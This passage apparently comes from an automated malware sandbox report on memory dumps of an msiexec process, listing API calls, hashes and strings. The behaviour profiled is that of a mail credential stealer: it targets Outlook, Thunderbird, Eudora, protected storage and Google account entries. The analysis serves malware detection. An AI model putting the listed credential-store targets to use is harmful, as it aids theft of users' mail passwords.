                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$File$LocalSpecific
                                                                    • String ID:
                                                                    • API String ID: 979780441-0
                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                    APIs
                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                    • String ID:
                                                                    • API String ID: 1386444988-0
                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateMessageRectSend
                                                                    • String ID: d=E
                                                                    • API String ID: 909852535-3703654223
                                                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$memcpywcslen
                                                                    • String ID: "
                                                                    • API String ID: 1983396471-123907689
                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                    APIs
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                    • String ID: URL
                                                                    • API String ID: 2108176848-3574463123
                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                    APIs
                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemcpy
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2789212964-323797159
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf
                                                                    • String ID: %%-%d.%ds
                                                                    • API String ID: 3988819677-2008345750
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E770
                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendmemset
                                                                    • String ID: F^@
                                                                    • API String ID: 568519121-3652327722
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PlacementWindowmemset
                                                                    • String ID: WinPos
                                                                    • API String ID: 4036792311-2823255486
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@DeleteObject
                                                                    • String ID: r!A
                                                                    • API String ID: 1103273653-628097481
                                                                    APIs
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                    • String ID: _lng.ini
                                                                    • API String ID: 383090722-1948609170
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                    • API String ID: 2773794195-880857682
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    APIs
                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040A908
                                                                    • free.MSVCRT ref: 0040A92B
                                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                    • free.MSVCRT ref: 0040B201
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B224
                                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID:
                                                                    • API String ID: 231171946-0
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                    • free.MSVCRT ref: 0040B0FB
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B12C
                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 3669619086-0
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                    • malloc.MSVCRT ref: 00417407
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                    • free.MSVCRT ref: 00417425
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1961120804-0

                                                                    Execution Graph

                                                                    Execution Coverage:2.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0.5%
                                                                    Total number of Nodes:762
                                                                    Total number of Limit Nodes:20
execution_graph: 762-node call graph of the msiexec.exe memory dump, rendered on the page as a flat node/edge list and not reproduced here. Recoverable structure: the CRT entry at 444c4a (GetModuleHandleA, __set_app_type, _initterm, __getmainargs, GetStartupInfoA) calls 40cf44, which resolves imports through LoadLibraryA/GetProcAddress (404a99, 410d0e), reads settings with GetPrivateProfileStringA/GetPrivateProfileIntA (409319, 40967a), registers and shows a window (40cc26: RegisterClassA, CreateWindowExA; 40d0b1: ShowWindow, UpdateWindow, LoadAcceleratorsA) and runs a GetMessageA / TranslateAccelerator / IsDialogMessage / TranslateMessage / DispatchMessageA loop until CoUninitialize at 40d17b. From 40ba28 the graph reaches 403c16, which walks the registry (RegEnumKeyExA at 410b62, RegQueryValueExA at 410add and 410b1e), enumerates files with FindFirstFileA/FindNextFileA (407ef8) after ExpandEnvironmentStringsA (4443b9), converts results with WideCharToMultiByte (40f96c, 40f6e2) and calls 4082cd, the GetComputerNameA/GetUserNameA routine listed below. Isolated nodes include 401455 (ExitProcess, GetWindowLongA, SetWindowLongA, EnumChildWindows), 410c68 (FindResourceA, SizeofResource, LoadResource, LockResource), 411853 (RtlInitializeCriticalSection, memset) and 40176c (ExitProcess).

                                                                    Control-flow Graph

control_flow_graph for 4082cd (10 basic blocks; the executed/not-executed colouring of the rendered graph is not preserved): the entry block 4082cd-40841a carries the four memset calls, GetComputerNameA, GetUserNameA, the two MultiByteToWideChar calls, two strlen calls and the memcpy listed below, then branches to 40841c or 408450-408453. 40841c enters a loop over 408422-40842b / 40842d-408431 / 408432-40844e that exits into 408450-408453; that block either enters a second loop over 408455-40845e / 408460-408464 / 408465-408482 or leaves through 408484-408488.
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040832F
                                                                    • memset.MSVCRT ref: 00408343
                                                                    • memset.MSVCRT ref: 0040835F
                                                                    • memset.MSVCRT ref: 00408376
                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                    • strlen.MSVCRT ref: 004083E9
                                                                    • strlen.MSVCRT ref: 004083F8
                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                    • String ID: 5$H$O$b$i$}$}
                                                                    • API String ID: 1832431107-3760989150

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                    • strlen.MSVCRT ref: 00407F64
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindstrlen$FirstNext
                                                                    • String ID: ACD
                                                                    • API String ID: 379999529-620537770

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 00401E8B
                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                    • strlen.MSVCRT ref: 00401F06
                                                                    • memset.MSVCRT ref: 00401FB1
                                                                    • atoi.MSVCRT(?), ref: 00401FE0
                                                                    • memset.MSVCRT ref: 00402003
                                                                    • sprintf.MSVCRT ref: 00402030
                                                                    • memset.MSVCRT ref: 00402086
                                                                    • memset.MSVCRT ref: 0040209B
                                                                    • strlen.MSVCRT ref: 004020A1
                                                                    • strlen.MSVCRT ref: 004020AF
                                                                    • strlen.MSVCRT ref: 004020E2
                                                                    • strlen.MSVCRT ref: 004020F0
                                                                    • memset.MSVCRT ref: 00402018
                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                    • API String ID: 3833278029-4223776976

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                    • API String ID: 745651260-375988210

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                    Strings
                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                    • pstorec.dll, xrefs: 00403C30
                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                    • API String ID: 1197458902-317895162

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                    • String ID: k:v
                                                                    • API String ID: 3662548030-4078055367

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044430B
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
